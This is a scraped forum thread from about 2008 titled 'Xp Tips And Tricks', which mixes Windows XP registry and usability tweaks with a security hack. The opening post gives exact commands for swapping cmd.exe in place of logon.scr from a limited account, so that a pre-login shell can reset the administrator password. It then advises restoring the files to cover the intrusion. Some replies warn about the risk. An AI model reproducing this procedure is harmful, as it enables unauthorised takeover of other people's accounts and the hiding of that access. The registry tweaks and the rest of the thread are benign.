Xp Tips And Tricks

Pages: 1, 2
free web hosting

Read Latest Entries..: (Post #12) by comkidwizzer3 on Feb 16 2008, 02:14 AM. (Line Breaks Removed)
I will try it later on when I can find my XP disk.
Read the FIRST post of this Topic. - Express your Opinion! Contribute Knowledge :-).

Free Web Hosting > Computers & Tech > Security issues & Exploits

Xp Tips And Tricks

XPkiller
QUOTE

WINDOWS TIPS COLLECTION
How to hack windows XP admin password


If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:

cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos

Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.

Once this happens if you enter this command minus the quotes

"net user <admin account name here> password"

If the Administrator Account is called Frank and you want the password blah enter this

"net user Frank blah"

and this changes the password on franks machine to blah and your in.


Have fun

p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks



Registry Hacking

Display legal notice on startup:
Wanna tell your friends about the do's and dont's in your computer when they login in your absence. Well you can do it pretty easily by displaying a legal notice at system start up.
REGEDIT
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]"legalnoticecaption"="enter your notice caption"
"legalnoticetext"="enter your legal notice text"

Automatic Administrator Login:
Well here's the trick which you can use to prove that Windows XP is not at all secure as multi-user operating system. Hacking the system registry from any account having access to system registry puts you in to the administrator account.
REGEDIT 4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"AutoAdminLogon"="1"

No Shutdown:
Wanna play with your friends by removing the shutdown option from start menu in their computer.
Just hack it down !!!
Regedit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
"NoClose"="DWORD:1"

Menu Delays:

Another minor and easy tweak to remove any delay from menus sliding out. For this you will need to use regedit (open regedit by going to Start -> Run..., then typing 'regedit' and pressing enter). The key you need to change is located in HKEY_CURRENT_USERControl PanelDesktop. The actual key is called MenuShowDelay - all you have to do is change the value to 0. Remember, you will have to re-boot your computer for this tweak to take effect.

GPEDIT.MSC And Autoplay

A great tweaking file that comes with XP is gpedit.msc. Go to Start -> Run... and then type in 'gpedit.msc' and press enter. This is effectively the Policies Editor, and it comes in handy often. For example, if you hate CD autoplay like I do and want to permanently disable it, you can use this tool to do so. Just run gpedit.msc, then go to Computer Configuration -> Administrative Templates -> System. In here you can see the value 'Turn Off Autoplay'. Right-click on it and then click 'Properties'.

Increasing options in add/remove programs:

Not a fan of MSN Messenger? don't want Windows Media Player on your system? Fair enough, but if you go to Add/Remove Programs in the Control Panel, by default none of Windows XP's 'built in' programs are visible. it's fairly easy to change, though... just open the file X:\Windows\inf\sysoc.inf (where X: is the drive letter where Windows XP is installed) in Notepad. You should see a section of the file something like this:

[Components]
NtComponents=ntoc.dll,NtOcSetupProc,,4
WBEM=ocgen.dll,OcEntry,wbemoc.inf,hide,7
Display=desk.cpl,DisplayOcSetupProc,,7
Fax=fxsocm.dll,FaxOcmSetupProc,fxsocm.inf,,7
NetOC=netoc.dll,NetOcSetupProc,netoc.inf,,7
iis=iis.dll,OcEntry,iis.inf,,7
com=comsetup.dll,OcEntry,comnt5.inf,hide,7
dtc=msdtcstp.dll,OcEntry,dtcnt5.inf,hide,7
IndexSrv_System = setupqry.dll,IndexSrv,setupqry.inf,,7
TerminalServer=TsOc.dll, HydraOc, TsOc.inf,hide,2
msmq=msmqocm.dll,MsmqOcm,msmqocm.inf,,6
ims=imsinsnt.dll,OcEntry,ims.inf,,7
fp_extensions=fp40ext.dll,FrontPage4Extensions,fp40ext.inf,,7
AutoUpdate=ocgen.dll,OcEntry,au.inf,hide,7
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7
RootAutoUpdate=ocgen.dll,OcEntry,rootau.inf,,7
IEAccess=ocgen.dll,OcEntry,ieaccess.inf,,7

This is a list of all components installed at the moment. I've taken the example of MSN Messenger - the program entry called 'msmsgs', third-last line. You can see the word 'hide' highlighted - this is the string which tells Windows not to display the component in the Add/Remove Programs list. Fix this up by simply deleting the word 'hide' like so:

msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7

To this:

msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,,7

Now, after restarting, you should be able to see MSN Messenger in the Add/Remove Programs list. If you want to be able to quickly view and remove all components, simply open the sysoc.inf file and do a global find and replace for the word ",hide" and replace it with a single comma ",".

Automatically Kill Programs At Shutdown:

don't you hate it when, while trying to shut down, you get message boxes telling you that a program is still running? Making it so that Windows automatically kills applications running is a snap. Simply navigate to the HKEY_CURRENT_USERControl PanelDesktop directory in the Registry, then alter the key AutoEndTasks to the value 1.

Speeding Up Share Viewing:

This is a great tweak. Before I found it, I was always smashing my head against the table waiting to view shares on other computers. Basically, when you connect to another computer with Windows XP, it checks for any Scheduled tasks on that computer - a fairly useless task, but one that can add up to 30 seconds of waiting on the other end - not good! Fortunately, it's fairly easy to disable this process. First, navigate to HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/Current Version/Explorer/RemoteComputer/NameSpace in the Registry. Below that, there should be a key called {D6277990-4C6A-11CF-8D87-00AA0060F5BF}. Just delete this, and after a restart, Windows will no longer check for scheduled tasks - mucho performance improvement!

Create a Shortcut to Lock Your Computer

Leaving your computer in a hurry but you don’t want to log off? You can double-click a shortcut on your desktop to quickly lock the keyboard and display without using CTRL+ALT+DEL or a screen saver. To create a shortcut on your desktop to lock your computer: Right-click the desktop. Point to New, and then click Shortcut. The Create Shortcut Wizard opens. In the text box, type the following: rundll32.exe user32.dll,LockWorkStation Click Next. Enter a name for the shortcut. You can call it "Lock Workstation" or choose any name you like. Click Finish. You can also change the shortcut's icon (my personal favorite is the padlock icon in shell32.dll). To change the icon: Right click the shortcut and then select Properties. Click the Shortcut tab, and then click the Change Icon button. In the Look for icons in this file text box, type: Shell32.dll. Click OK. Select one of the icons from the list and then click OK You could also give it a shortcut keystroke such CTRL+ALT+L. This would save you only one keystroke from the normal command, but it could be more convenient.

Speed up Internet Explorer 6 Favorites
For some reason, the Favorites menu in IE 6 seems to slow down dramatically sometimes--I've noticed this happens when you install Tweak UI 1.33, for example, and when you use the preview tip to speed up the Start menu. But here's a fix for the problem that does work, though it's unclear why: Just open a command line window (Start button -> Run -> cmd) and type sfc, then hit ENTER. This command line runs the System File Checker, which performs a number of services, all of which are completely unrelated to IE 6. But there you go: It works.

Aspi

WinXP does not come with an Aspi layer. So far almost 90% of the problems with WinXP and CD burning software are Aspi layer problems. After installing WinXP, before installing any CD burning software do a few things first: 1. Open up "My computer" and right click on the CD Recorder. If your CD recorder was detected as a CD recorder there will be a tab called "Recording". On this tab uncheck ALL of the boxes. apply or OK out of it and close my computer. 2. Next install the standard Aspi layer for NT. Reboot when asked. That's is. after the reboot you can install any of the currently working CD recording applications with no problems. If using CD Creator do not install direct CD or Take two as they are currently incompatible but Roxio has promised a fix as soon as XP is released.

 

 

 


Reply

Chesso
May I suggest, revising and re-formatting this text (and if it is gained from somewhere else word, for word, use the QUOTE tags and add the source URL if applicable).

Reply

XPkiller
hmm, it didnt copy properly, it looked OK, when i previewed it
it had the quotes and everything.......

Reply

SilverFox
Chesso what more could u expect more from danmidas?

Why does it use unix commands (cd) if its a windows hack?

Reply

HellFire121
I wouldn't personally muck around with the registry like this, i'd rather use some tweak program (For example the type that comes with norton system works)
Good info anyways but yeah as i said i wouldn't do this.
I find that you can't do much editing with the command prompt itself. It's good for shell things like copying, running files, viewing services etc etc

-HellFire

Reply

Grafitti
QUOTE
Create a Shortcut to Lock Your Computer

or simply press Windows+L
same function and just as quick

Reply

patronus4000
I agree with HellFire. It's dangerous to play around with the registries, especially when you really don't know what you're doing. A spelling mistake in those instructions or even some other typo could seriously destroy someone's computer. I'm already scared enough when I'm cleaning my registry out. XD (I install and uninstall a lot of random applications, okay?)

Besides that point, some of them are quite threatening to all admins. I wouldn't want users I set to limited to be hacking into my administrator account! D= They're a danger to my computer and privacy!

Serena

Reply

toby
The only one I thought would be useful, the shortcut lock, just does the same thing as switch user on the logoff menu.

Reply

Grafitti
Yes, but knowing that there is the potential for someone to elevate themselves to admin level and do what they want is helpful, because if you weren't told about it, you'd be thinking you were safe while they're laughing behind your back. Like this, you know Windows is not necessarily a total safe environment, so you supplement the protection with 3rd party programs that specialize in it. some that come to mind off hand are Folder Guard, Winguard, !st Security Administrator, and PC Security.

Reply

robert2411
thanks
this is very usefull
can you ride more of this stuff


Reply

Latest Entries

comkidwizzer3
I will try it later on when I can find my XP disk.

Reply

cybernaut
This is a good tips. I might try it one day. Thank you.

Reply


Got an Opinion! Express your Views! (no registration):-
Add your Reply/ Opinion/ Views/ Comments/ Suggestion/ Questions/ Queries etc.
Posts with decent grammar & English will be accepted and please refrain from profanities.
For asking a Question, We recommend you to sign-up (for free) so that you can track the topic easily.

Nature of your Post*: Opinion/ Reply/ Comments
Question/Query
Feedback to us.
       
Name   Email
Title/Question*

(Maximum characters: 10,000)
You have characters left.

Pages: 1, 2
Recent Queries:-
  1. can not find netoc.inf - 9.95 hr back. (1)
  2. cmd tips and tricks - 39.72 hr back. (1)
  3. or function faxocmsetupproc - 73.03 hr back. (2)
  4. msmqocm function - 83.17 hr back. (1)
  5. xp latest tips and tricks - 131.27 hr back. (1)
  6. funny tips for windows xp for hacking - 154.07 hr back. (1)
  7. logon.scr roxio - 167.73 hr back. (1)
  8. pdf file of xp tricks - 231.13 hr back. (1)
  9. windows xp tips and tricks websites - 259.26 hr back. (2)
  10. netoc.inf missing - 259.85 hr back. (1)
  11. xp regedit tricks - 347.70 hr back. (1)
  12. xp tips and tricks menu show delay - 382.08 hr back. (1)
Similar Topics

Keywords : xp, tips, tricks

  1. How To Re-install Office 2003 Trial
    Tips for reinstalling Office after trial ends. (1)
  2. Seo Tips
    (0)
    The following are some simple tips you can follow to add more visibility and boost your trafic and
    SE rankings to your site: Make sure that your site is complete and with unique and rich content,
    after that submit it to Google, Yahoo, MSN and ASK.com. Additionaly consider to submit it to high PR
    web and open directories, and to some social bookmarking site like del.icio.us. Create two sitemaps
    for your site, one in HTML format to show to your visitors and another one to submit to Google,
    Yahoo, MSN and ASK.com prefered in XML format or in sitemap format . Avoid dupli....
  3. Windows Xp Tricks
    Some noobish tricks for winXP (3)
    Here are somme kool noob tricks you can do on windows Xp and maybe other verions. Havent tried on
    others yet. You do these AT YOUR OWN RISK. I TAKE NO RESPONSIBLITY FOR WHAT YOU DO WITH THESE.
    QUOTE Lock XP Workstation (#1) You can lock your XP workstation with two clicks of the mouse.
    Create a new shortcut on your desktop using a right mouse click, and enter 'rundll32.exe
    user32.dll, LockWorkStation' in the location field. Give the shortcut a name you like.
    That's it -- just double click on it and your computer will be locked. And if that's not ea....
  4. Top 10 Bittorrent Tools And Tricks
    (12)
    BitTorrent is the go-to resource for downloading everything, but as its popularity continues to
    grow, so do the number of tools available for making the most of it. Some are must-haves, while
    others are a waste of time. Climb aboard for a look at 10 of the best BitTorrent utilities, tools,
    and resources for finding and managing your downloads.
    http://lifehacker.com/350405/top-10-bittor...ools-and-tricks ....
  5. Tips To Earn In Google Adsense
    (7)
    This is not mine but i will just share this. -------------------------------------------------- Earn
    easy with google adsense works 100%.Try these it will work and u will get 4$ to 8$ to
    these word search. * Add google search box in your site *Then goto google search box type forex
    *Then click search button then it will prompt you 4 or 3 ads by google at the TOPLEFT of your
    screen. *Right click and open those there or four ads. *wait for 1 hours then login to your
    adsense account will find 4$ to 8$ amount. Note while you search and click use pro....
  6. Halo 3 - Some Useful [saved Film Clips] Tips
    Halo 3 Videos Tips. (0)
    Some Useful Tips Saved Film Clips are a very popular way to cut down your Saved Films into
    smaller chunks where the actual clip is located. After watching numerous videos in this Forum, the
    Halo 3 Videos Forum, I have noticed many problems people have been running into with Saved Film
    Clips. 1. No Reticle I have seen a few videos where the reticule is missing. While un-zoomed it may
    not be a huge difference, once you do zoom-in with your sniper of BR, the entire middle portion of
    the screen is blank and simply appears closer and larger than before. For some reason Sa....
  7. Tips Or Suggestions (website Banner/layout)
    (2)
    Sort of a general graphical question. I'm basically looking for tips and suggestions on what I
    can do for a name banner/site layout based on the name and some preferences. Any and all
    suggestions/tips are welcome. Right now I have http://www.chessoscorner.com (hosted here of
    course). But as soon as my registar fixes it's annoying problems lol, I'm going to register
    a new domain, and build a new website somewhat (based on the one I am running now). For the most
    part it is a name change, but I am going to use this as an opportunity to re-design the site ....
  8. Did You Know These Basic Firefox Tips?
    (8)
    You can easily double the joy of using Firefox by knowing these essential Firefox tips.
    http://cybercapital.org/index.php/2007/05/...c-firefox-tips/ ....
  9. Top 10 Pdf Tricks
    (1)
    The article linked below is interesting if you've ever wanted to: - Make custom PDF notepaper -
    Convert files to PDF online - Annotate PDF's with Skim - Password protect PDF's - Merge PDF
    files - Edit PDF's with PDF Tools - Speed up your PDF reader - Manage your PDF library in iTunes
    - Convert that whiteboard to PDF - Save any document as a PDF
    http://lifehacker.com/software/lifehacker-...icks-289583.php I found something interesting in it -
    I found how you can take just about any office document or image file and have it converted to PDF
    and sent t....
  10. Linux - How To Generate Public-private Key Pairs And Secure Web Browsing Tips
    (2)
    SSH is an important tool in Linux / UNIX and an amazing piece of software. It's one of the top 2
    or 3 things that an experienced Linux / UNIX system administrator uses every single day. People use
    SSH to connect to their home machines from work and to their servers from both work and home. People
    use SSH in backup scripts. People use SSH for lots of other things. There is some interesting
    history about SSH - it was originally developed by some company and the original versions were
    actually open-sourced, and then they closed it up at some point but then some other d....
  11. Nhl 2007
    tips fr fighting (1)
    tips for fighting. triangle is to uppercut. O is to punch if you move around the guy will get
    exhausted run away if you want to have fun when you fight then run around the ref and then ifyou get
    a chance uppuercut punch him. ....
  12. Bash Tips And Tricks From My Own Experience - Several Instalments
    (2)
    Quick overview of bash As mentioned in this forum before, bash is the most popular shell
    environment in the Linux world, and a good tutorial can be found here:
    http://www.tldp.org/LDP/abs/html/ The purpose of this topic is to show you a couple of quick
    how-to nuggets that I'm deriving from personal experience, both from using bash inside of Linux
    itself, as well as from using cygwin, a Win32 port of a bunch of Linux utilities, which includes
    bash as one of the shell options for running commands in. All examples have been made using cygwin
    in a Windows environmen....
  13. Little Tips For Php Coder
    (3)
    When you're coding, you happen to get confused with these features although you may not.
    "content" 'content ' These may be looking too simple tip. I know that. The matter is
    this can be really useful for most of the times while you're coding in PHP. Try it out when you
    were not aware of these features. You will like it for sure. -- Have a nice day! My blog :
    silverbluewater.blogspot.com ....
  14. 4 Html Based Website Tips
    (4)
    Their are many factors to take into consideration when created your own personal webpage, or a huge
    website system such as gaming communitys equiped with systems to upload your custom content. All
    these hints are intended for HTML based websites. Background One thing to think about is adding
    some kind of background detail. Whether is be a simple background color, a simple background image.
    In fact i encourage you to keep it simple to reduce loading times, and to keep from drawing to much
    attention away from what the site is really intended to do. One thing that i bel....
  15. Very Good Tips For Bloggers(google Bloger)
    Introduction to the good site (7)
    I want to introduce a really good site called 'Tips for New Bloggers' -
    http://tips-for-new-bloggers.blogspot.com . This site has the best tips for bloggers who is
    interested in blogging and especially for the people who uses blogger service. With this site and
    blogger, you would be able to have terrific blogging service provided from google blogger service.
    With the site introduced here, you are most likely to have terrific blogging experience with cutting
    the edge tips for blogging. With this site, you will feel like to move to Blogger. With this site,
    yo....
  16. 5 Tips To Evade Rapidshare Waiting Time.
    i have permission To Post From The Creator (9)
    QUOTE Here are some hints to help you more efficently use rapidshare. Rapidshare has been an
    excellent tool for sharing large files. Over the last few weeks, many people have figured out how to
    more efficently use this service. I wanted to document some of these suggestions here. If you have
    more please let me know. Rapidshare traces the users IP address to limit each user to a certain
    amount of downloading per day. To get around this, you need to show the rapidshare server, a
    different IP address. You can do this one of multiple ways. 1. Short-Out the java scri....
  17. Some Little Php Tips.
    (5)
    I think this is probably my first article/tutorial on here /smile.gif"
    style="vertical-align:middle" emoid=":)" border="0" alt="smile.gif" />. I have been playing around
    with a new site lately, and co-incidentally, as soon as I started with the PHP etc, I have people on
    MSN Messenger flooding me with questions, mostly in the form of "help me, help me" etc. Well, a few
    small tips and explanations on them I gave over MSN Messenger, gave me the idea of posting an
    article/tutorial (or whatever you want to call it) here about it. RELATIVE PATHING : The first
    thing to ....
  18. Tips For Modifying Wordpress Code
    How to make it work the way you like (1)
    Some time ago I decided to convert my current web site (done in Joomla! CMS) to WordPress.
    Mostly because it is less bulky when compared to Joomla! CMS and has exactly the functions I
    need, unlike Joomla, where I found numerous options which I didn't need. Of course, as every
    professional web master (yes, I like to see myself as pro /tongue.gif"
    style="vertical-align:middle" emoid=":P" border="0" alt="tongue.gif" />), I wasn't completely
    satisfied with the way WordPress delivers content, and so I decided to modify its code in order to
    make it perfect. U....
  19. Ten Tips To Increase Your Windows Security
    (9)
    Ten tips to increase your Windows security 1-always protect your Administrator account by
    creating password, just go to Control Panel > User Accounts, select your account and the click on
    "create a password for your account". 2-Protect your account by Password protect your screen saver,
    go to Control Panel > Display, Click on the Screen Saver tab and then check on resume password
    protect. 3- Setup a BIOS Password to protect your PC Setup application. 4- Always force you
    windows automatic update on, go to Control Panel > Automatic Updates and then Select the first ....
  20. Tips For Increasing The Quality Of Performance Of A 500 Mhz Pc
    (3)
    Tips for Increasing the quality of performance of a 500 MHz PC Introduction This manual is
    to help you get the most of your PC. I work a lot with low level PCs, 500 Megahertz (MHz) or so.
    While you might not think a slower Central Processing Unit (CPU) can run successfully Windows XP but
    it can, however it takes some tweaking of the settings. Step 1: Cutting down on the Graphics Drain
    Windows XP comes with a sleek, brilliant and attractive graphical lay at, however beware, such a
    good graphical layout takes up a large part of your CPU resources. While its pre....
  21. Quick Tips On Html And Css
    (11)
    Here are just some general tips, helpers and time-savers for HTML and CSS. HTML Ideally, you should
    be working under the XHTML 1.1 doctype specification. Some reasons: Improved semanticism - make use
    of the elements available appropriately to convey the information as it was intended. Improved
    understanding - because of an increase in semanticism, it's easier for your audience to
    understand what your trying to convey. Cleaner code - due to the deprecation of some elements and
    the strict requirements of nesting, closing and structure, your code becomes much cleane....
  22. Google URL And Domain Name Optimization
    some tips (11)
    Before optimizing your on page factors and building the inbound links to your sites, you first need
    to look at your domain name and URL structure. Here are a few tips from statistical research about
    domain names and URLs that might be contrary to what you have heard in the Internet Marketing
    forums... Include Your Keyword The keyword that best describes your site should be included in your
    domain name. Use Overture.com inventory tool or WordTracker.com to find the keyword that has some
    search volume. Try not to use a keyword no one is searching for. Avoid Dashes Peopl....
  23. A New Sub-category Topic On Games Tips & Tricks
    Sharing Tips & Tricks in playing games at the highest difficulty l (3)
    Hi... I have a suggestion. What do you guys think about a sub-category in the main Games section
    dealing only with tips & tricks on playing games at the highest difficulty level. I'm not
    referring to cheatcodes here. No unlimited amount of money, extra life or extra troops here. Just
    using the "normal" resources allocated to you and then completing the mission at the highest
    difficulty level. For example, there might be a precious artifact somewhere or a better fortified
    place to position your base... something like that. Basically, you can say that it is about shari....
  24. Command Prompt Tips
    (1)
    Command Prompt tips How to change Command Prompt settings You can easily change Windows
    Command Prompt settings, such as: Font, Font Size, Color, background, Buffer Size and … To change
    Command Prompt, Right-click the title bar of the command prompt window, and select Properties. Here
    you can change command prompt settings. How to copy text from a Command Prompt 1-Right-click the
    title bar of the command prompt window, click Edit> and select Mark. 2- Now, you can select the text
    you want to copy, just click and drag the cursor to select the text. 3- Right-click....
  25. Command Line (dos) Tips For Windows Xp
    (5)
    Windows XP cmd tip (DOS isn’t dead... it just smells funny) Some command-line folder creation
    examples: To create multiple folders at once, add them directly to the "md" command: C:\> md
    this is a test To create a folder several folders deep, use: C:\> md
    this\is\a\test Creating a folder with a long name requires the double-quote at the
    beginning: C:\> md "this is a test Bonus tip: Windows XP supports the forward slash "/" as a
    folder divider. Unix/Linux users: don't let the DOS environment get you down. Use a Unix-style
    CD comman....
  26. Need Tips On Booting Faster (windows)?
    Need help booting up faster. (22)
    Can anyone tell me some tricks to speed up my boot time casue now it takes like 5 minutes.....
  27. Secure Php Coding
    tips and hints for more secure PHP'ing (10)
    Secure PHP coding Today, PHP is a very common and very popular scripting language that is used
    by many people over the world. However, many php scripts that they make are vulnerable to
    'hacks' by leaving some security holes open. This article will explain how someone can abuse
    your script and can alter your site/files, but also (even more important), this article will tell
    you how to PREVENT your site from being hacked and how to spot and fix those security holes.
    Contents: - Chapter 1 : To serve or not to serve - Chapter 2 : MySql, friend or foe? - Conclu....
  28. Google Adsense Tips
    Adsense Adwords - Top Keywords (1)
    Google Adsense Tips If you hear about people achieving high payments per click with AdSense,
    remember that's only part of the story. You also need lots of page views and a high
    click-through rate. Here are some ideas on how to achieve those three things : 1. If
    you're starting afresh designing a site specifically for AdSense revenue, you'll want a
    simple design that makes it easy to paste Google's code into a horizontal or vertical space on
    the site. For experienced webmasters, that's easy. 2. To increase your click-throughs, design
    a sim....
  29. Transferring Large Files Online
    Any suggestions/tips? (10)
    I have a folder of 50 mb worth of pics that I need to transfer to my friend for a photo project.
    Now, I was trying to zip it but no matter what zip program I used, it barely decreased the size. Are
    pictures just not zippable? Also, are there any free image-hosting sites that allow larger file
    sizes? I normally use imageshack.us, but that limits file sizes (like most free hosting sites). I
    even looked into free websites, but most of them limit files sizes to be uploaded. The only other
    option we're trying now is transfer via AIM, but that's hard because it'....
  30. Basic Tips and Tricks in HTML
    (15)
    Here is some quick links for basic html coding... A quick and easy way to create your first web
    page! -> The easiest HTML guide for beginners You'll learn how to create tables from real
    examples. -> How to create TABLE? You will learn how to create frames from a real example.
    You'll see how to create a borderless frame, how to specify the target frame, etc. -> How to
    build FRAMES? Follow a few easy steps to add sound to your web pages. -> How to add sound to a
    web page? This page tells you how to automatically load a visitor to another web p....

    1. Looking for xp, tips, tricks

*RANDOM STUFF*





*SIMILAR VIDEOS*
Searching Video's for xp, tips, tricks
advertisement




Xp Tips And Tricks



 

 

 

 

ADD REPLY / Got an Opinion! a humble request :-) RAPID SEARCH! Free Hosting [X]
Express your Opinions, Thoughts or Contribute your information that might help someone here.
Ask your Doubts & Queries to get answers.. "Together, We enlight each other!"
Register FREE for AD-FREE forum, Create your own topics, Ask Questions, track topics, setup subscriptions & notifications and Get a Free Website w/ Email and FTP.
500MB Space *No Ads*, CPanel, FTP, PHP, MySQL, EMails - 100% FREE